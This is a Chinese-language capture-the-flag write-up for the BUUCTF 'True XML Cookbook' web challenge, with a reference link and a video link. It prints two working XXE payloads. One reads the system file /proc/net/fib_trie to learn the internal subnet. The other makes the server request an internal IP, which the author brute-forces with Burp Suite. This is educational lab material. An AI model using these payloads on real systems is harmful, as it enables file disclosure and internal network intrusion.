BUUCTF WEB TRUE XML COOKBOOK
由于某种神秘的不可抗力,很久没更新了,emmmm。以后还是勤快一点吧言归正转,这题都已经把提示给到脸上了,xml,这不试试xml注入?经典登录界面,抓包就可以发现数据事宜xml形式的传往后台的X-Requested-With: XMLHttpRequest依旧推荐https://xz.aliyun.com/t/6887#toc-5构造倒是没有多难,但这题最大的坑点在于flag不是在本地的,所以他是
·
由于某种神秘的不可抗力,很久没更新了,emmmm。以后还是勤快一点吧
言归正转,这题都已经把提示给到脸上了,xml,这不试试xml注入?
经典登录界面,抓包就可以发现数据事宜xml形式的传往后台的
X-Requested-With: XMLHttpRequest
依旧推荐https://xz.aliyun.com/t/6887#toc-5
构造倒是没有多难,但这题最大的坑点在于flag不是在本地的,所以他是一个内网题。。。。
一个小经验:由于BUUCTF转用了K8S管理,他的靶机容器是随机在80,81两个网段里的
具体情况看/proc/net/fib_trie
读取到本题靶机被动态生成在了10.244.81网段,每次生成ip都是随机的
那么抓包用burpsuite爆破就好了
给出payload:
读取网段
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY admin SYSTEM "file:///proc/net/fib_trie">
]>
<user><username>&admin;</username><password>admin</password></user>
搜索flag:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY admin SYSTEM "http://10.244.81.166">
]>
<user><username>&admin;</username><password>admin</password></user>
参考视频链接:https://www.bilibili.com/video/BV1Y5411d7nb?spm_id_from=333.999.0.0
更多推荐
已为社区贡献3条内容
所有评论(0)